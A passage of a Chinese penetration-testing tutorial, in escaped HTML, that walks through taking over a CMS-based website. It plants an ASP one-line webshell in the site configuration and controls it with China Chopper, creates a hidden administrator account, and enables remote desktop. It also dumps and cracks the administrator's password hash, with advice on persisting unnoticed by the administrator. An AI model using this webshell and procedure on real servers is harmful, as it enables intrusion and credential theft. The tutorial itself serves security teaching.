data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-d05e8f0cdc33ecec6f37_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='532'%20height='141'&&\u002Fsvg&\& data-rawwidth=\&532\& data-rawheight=\&141\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&532\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-d05e8f0cdc33ecec6f37_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-d05e8f0cdc33ecec6f37_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E得到结果,明文密码为admin888\u003C\u002Fp\u003E\u003Cp\u003E现在有了用户名和密码,我们就返回后台登陆页面\u003C\u002Fp\u003E\u003Cp\u003E输入信息后成功登陆\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-abd510af3b51b937c4d0df_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&124\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-abd510af3b51b937c4d0df_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='124'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&124\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-abd510af3b51b937c4d0df_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-abd510af3b51b937c4d0df_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-d7da79ac59edfdf270047_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&253\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-d7da79ac59edfdf270047_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='253'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&253\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-d7da79ac59edfdf270047_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-d7da79ac59edfdf270047_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E成功进入后台\u003C\u002Fp\u003E\u003Cp\u003E接下来我们需要获取webshell,这一步仁者见仁智者见智,需要凭借个人的经验来多次尝试分析确定\u003C\u002Fp\u003E\u003Cp\u003E此处仅提供个人思路\u003C\u002Fp\u003E\u003Cp\u003E我们点击左侧的“系统设置管理”—》“网站信息配置”\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-9f594f968da7b27d48d0d93e52837ab1_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&250\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-9f594f968da7b27d48d0d93e52837ab1_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='250'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&250\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-9f594f968da7b27d48d0d93e52837ab1_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-9f594f968da7b27d48d0d93e52837ab1_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E在公司名称处将原信息删除,换成我们的一句话木马\u003C\u002Fp\u003E\u003Cp\u003E\&%&&%Eval Request(Chr(35))%&&%'\u003C\u002Fp\u003E\u003Cp\u003E(解释:1.句首和句尾的引号用于闭合语句,2.Request()中的内容即连接菜刀时需要的密码,此处用的Chr(35)指的是ascii值为35的符号,即#,3.Eval\u003Cbr\u003ERequest()是asp一句话木马的常用格式)\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-9f9fd94b71eb20d3864a3_b.jpg\& data-rawwidth=\&410\& data-rawheight=\&61\& class=\&content_image\& width=\&410\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='410'%20height='61'&&\u002Fsvg&\& data-rawwidth=\&410\& data-rawheight=\&61\& class=\&content_image lazy\& width=\&410\& data-actualsrc=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-9f9fd94b71eb20d3864a3_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-b85da47de65e53d2bb9414c_b.jpg\& data-rawwidth=\&549\& data-rawheight=\&366\& class=\&origin_image zh-lightbox-thumb\& width=\&549\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-b85da47de65e53d2bb9414c_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='549'%20height='366'&&\u002Fsvg&\& data-rawwidth=\&549\& data-rawheight=\&366\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&549\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-b85da47de65e53d2bb9414c_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-b85da47de65e53d2bb9414c_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E点击保存设置\u003C\u002Fp\u003E\u003Cp\u003E接下来的步骤是连接菜刀\u003C\u002Fp\u003E\u003Cp\u003E打开菜刀,界面如图\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-2ccebcc3d41702cdc0c59a3_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&296\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-2ccebcc3d41702cdc0c59a3_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='296'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&296\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-2ccebcc3d41702cdc0c59a3_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-2ccebcc3d41702cdc0c59a3_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E在空白处右键,添加,在弹出框中输入地址及密码(之前说过为#)\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-48b096febe31084eda0e30_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&267\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-48b096febe31084eda0e30_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='267'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&267\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-48b096febe31084eda0e30_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-48b096febe31084eda0e30_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E这里小白白们可能会问了,为什么地址后面的\u002Finc\u002Fconfig.asp之前没有见过呢?\u003C\u002Fp\u003E\u003Cp\u003E是这样的,这个网站用的是魅力企业网站管理系统(一个cms),我们可以在网上下到它的源码,可以看到它整个的目录结构,自然会明白我们修改的一句话的目录在\u002Finc\u002Fconfig.asp\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E输入信息后点击添加,发现连接成功\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-27b3619bdba9c8aa967d7_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&300\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-27b3619bdba9c8aa967d7_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='300'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&300\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-27b3619bdba9c8aa967d7_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-27b3619bdba9c8aa967d7_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E注意:一般的CTF比赛,做到这个程度就可以在各个目录里找flag了,不过这次我们把整个渗透流程介绍完\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E接下来我们需要提权,那么就需要通过菜刀上传提权工具,这里上传的位置要选好,一般而言,c盘的子目录中的文件可执行的可能性较大\u003C\u002Fp\u003E\u003Cp\u003E提权经典的搭配是cmd+3389+pr,我们这里就用这个组合,同时选定上传目录为C:\\RECYCLER\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-05d675eed2d0b3c98f5e_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&259\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-05d675eed2d0b3c98f5e_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='259'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&259\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-05d675eed2d0b3c98f5e_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-05d675eed2d0b3c98f5e_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E直接将我们需要用到的工具pr,3389,cmd选中后拖进即可\u003C\u002Fp\u003E\u003Cp\u003E可以看到已经上传成功\u003C\u002Fp\u003E\u003Cp\u003E选中cmd,右击选择虚拟终端,打开如图所示页面\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-ce2cebd6afb992a4b7d680b_b.jpg\& data-rawwidth=\&510\& data-rawheight=\&217\& class=\&origin_image zh-lightbox-thumb\& width=\&510\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-ce2cebd6afb992a4b7d680b_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='510'%20height='217'&&\u002Fsvg&\& data-rawwidth=\&510\& data-rawheight=\&217\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&510\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-ce2cebd6afb992a4b7d680b_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-ce2cebd6afb992a4b7d680b_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E敲回车后开始输入我们的命令\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-ca5505beca0ff5eae61fce0_b.jpg\& data-rawwidth=\&294\& data-rawheight=\&145\& class=\&content_image\& width=\&294\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='294'%20height='145'&&\u002Fsvg&\& data-rawwidth=\&294\& data-rawheight=\&145\& class=\&content_image lazy\& width=\&294\& data-actualsrc=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-ca5505beca0ff5eae61fce0_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E来切换到我们提权工具所在的目录\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E我们开始使用pr创建用户,用法如图\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-8e0fe8f1bc13fc46cd9dd8_b.jpg\& data-rawwidth=\&519\& data-rawheight=\&370\& class=\&origin_image zh-lightbox-thumb\& width=\&519\& data-original=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-8e0fe8f1bc13fc46cd9dd8_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='519'%20height='370'&&\u002Fsvg&\& data-rawwidth=\&519\& data-rawheight=\&370\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&519\& data-original=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-8e0fe8f1bc13fc46cd9dd8_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-8e0fe8f1bc13fc46cd9dd8_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E注意,虽然pr “net user yale 888 \u002Fadd”执行后提示命令成功完成,为了确认,我们可以输入pr “net user”确保确实成功添加该用户(用户名yale,密码888)\u003C\u002Fp\u003E\u003Cp\u003E接下来我们尝试将yale添加到系统管理员组\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-71c12ef005c8826cdf5ad60d_b.jpg\& data-rawwidth=\&504\& data-rawheight=\&382\& class=\&origin_image zh-lightbox-thumb\& width=\&504\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-71c12ef005c8826cdf5ad60d_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='504'%20height='382'&&\u002Fsvg&\& data-rawwidth=\&504\& data-rawheight=\&382\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&504\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-71c12ef005c8826cdf5ad60d_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-71c12ef005c8826cdf5ad60d_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E同理,第二条命令是为了确保添加成功\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E既然添加成功了,我们接下来就开启C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-192ffa0f8b5800d1ecc85c_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&243\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-192ffa0f8b5800d1ecc85c_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='243'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&243\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-192ffa0f8b5800d1ecc85c_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-192ffa0f8b5800d1ecc85c_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E我们win+r,打开运行框后输入mstsc,打开远程桌面连接\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-96dfb281d36a1e982ca40_b.jpg\& data-rawwidth=\&339\& data-rawheight=\&163\& class=\&content_image\& width=\&339\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='339'%20height='163'&&\u002Fsvg&\& data-rawwidth=\&339\& data-rawheight=\&163\& class=\&content_image lazy\& width=\&339\& data-actualsrc=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-96dfb281d36a1e982ca40_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-195b5b18b4cf64c92ac871c_b.jpg\& data-rawwidth=\&410\& data-rawheight=\&222\& class=\&content_image\& width=\&410\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='410'%20height='222'&&\u002Fsvg&\& data-rawwidth=\&410\& data-rawheight=\&222\& class=\&content_image lazy\& width=\&410\& data-actualsrc=\&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-195b5b18b4cf64c92ac871c_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E在空白框中输入ip即可开始连接\u003C\u002Fp\u003E\u003Cp\u003E点击连接后弹出认证界面,输入我们创建的用户名和密码\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-f665af7d2fb0de327b37f3f899a88b63_b.jpg\& data-rawwidth=\&409\& data-rawheight=\&232\& class=\&content_image\& width=\&409\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='409'%20height='232'&&\u002Fsvg&\& data-rawwidth=\&409\& data-rawheight=\&232\& class=\&content_image lazy\& width=\&409\& data-actualsrc=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-f665af7d2fb0de327b37f3f899a88b63_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E点击确定即可成功登陆\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-ab52d958ab14d33566c7_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&423\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-ab52d958ab14d33566c7_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='423'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&423\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-ab52d958ab14d33566c7_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic4.zhimg.com\u002Fv2-ab52d958ab14d33566c7_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E接下来我们需要想到这个问题:以后远程登陆难道及靠我们自己创建的帐号吗?要是哪天被管理员发现了,那怎么办,所以长久之计是在获取系统管理员的密码后删除自己创建的用户\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E那么,接下里我们要做的就是找到系统管理员的密码\u003C\u002Fp\u003E\u003Cp\u003E我们这里用到的工具是quarksdump,还是和前三个工具一样,拖到菜刀里直接上传\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-4cc25eee92c_b.jpg\& data-rawwidth=\&522\& data-rawheight=\&166\& class=\&origin_image zh-lightbox-thumb\& width=\&522\& data-original=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-4cc25eee92c_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='522'%20height='166'&&\u002Fsvg&\& data-rawwidth=\&522\& data-rawheight=\&166\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&522\& data-original=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-4cc25eee92c_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-4cc25eee92c_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Cp\u003E我们在远程连接的服务器中打开cmd窗口\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic7.zhimg.com\u002Fv2-e76fdc7e01ba704db1b9_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&362\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic7.zhimg.com\u002Fv2-e76fdc7e01ba704db1b9_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='362'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&362\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic7.zhimg.com\u002Fv2-e76fdc7e01ba704db1b9_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic7.zhimg.com\u002Fv2-e76fdc7e01ba704db1b9_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E进入recycler目录看到工具已上传\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-051e2abaaab3_b.jpg\& data-rawwidth=\&469\& data-rawheight=\&270\& class=\&origin_image zh-lightbox-thumb\& width=\&469\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-051e2abaaab3_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='469'%20height='270'&&\u002Fsvg&\& data-rawwidth=\&469\& data-rawheight=\&270\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&469\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-051e2abaaab3_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-051e2abaaab3_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E输入quarkspwdump.exe回车后立刻弹出如下窗口\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-ad1f76dac485_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&345\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-ad1f76dac485_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='345'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&345\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-ad1f76dac485_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-ad1f76dac485_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E输入如图命令,回车即可得到\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-92c8e21a0dfb2b33cf9190caff801111_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&186\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-92c8e21a0dfb2b33cf9190caff801111_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='186'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&186\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-92c8e21a0dfb2b33cf9190caff801111_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic1.zhimg.com\u002Fv2-92c8e21a0dfb2b33cf9190caff801111_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E我们看到最下面一列是Administrators跟随的一串字符,这其实也是一串hash加密过的密码值(Windows系统下\u003Ci\u003E的hash\u003C\u002Fi\u003E密码格式为:用户名称:RID:LM-HASH值:NT-HASH值),解密得到\u003C\u002Fp\u003E\u003Cfigure\u003E\u003Cnoscript\u003E\u003Cimg src=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-6e49cb676f69b81fffb22c58e353da9d_b.jpg\& data-rawwidth=\&554\& data-rawheight=\&64\& class=\&origin_image zh-lightbox-thumb\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-6e49cb676f69b81fffb22c58e353da9d_r.jpg\&\u003E\u003C\u002Fnoscript\u003E\u003Cimg src=\&data:image\u002Fsvg+utf8,&svg%20xmlns='http:\u002F\u002Fwww.w3.org\u002FFsvg'%20width='554'%20height='64'&&\u002Fsvg&\& data-rawwidth=\&554\& data-rawheight=\&64\& class=\&origin_image zh-lightbox-thumb lazy\& width=\&554\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-6e49cb676f69b81fffb22c58e353da9d_r.jpg\& data-actualsrc=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-6e49cb676f69b81fffb22c58e353da9d_b.jpg\&\u003E\u003C\u002Ffigure\u003E\u003Cp\u003E密码为cu9e2cgw\u003C\u002Fp\u003E\u003Cp\u003E渗透测试结束。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Ch2\u003E\u003Cb\u003E0x03\u003C\u002Fb\u003E\u003C\u002Fh2\u003E\u003Cp\u003E总结:我们这次的演示是一次典型的渗透测试的过程,主要思路为\u003C\u002Fp\u003E\u003Cp\u003E扫后台—找注入点获取后台登陆密码—上传一句话木马---菜刀连接—提权—拿服务器获取系统管理员密码\u003C\u002Fp\u003E\u003Cp\u003E用到的工具有:御剑、明小子、菜刀、pr、3389、cmd、quarkspwdump等\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\u002Fp\u003E\u003Ch2\u003E\u003Cb\u003E0x04\u003C\u002Fb\u003E\u003C\u002Fh2\u003E\u003Cp\u003E本文仅做技术分享及普及渗透流程之用,如有人企图以此来进行不合法的渗透等破坏网络安全的行为与本文作者及合天智汇无任何关系。特此声明。\u003C\u002Fp\u003E\u003Cp\u003E\u003Cbr\u003E\u003C\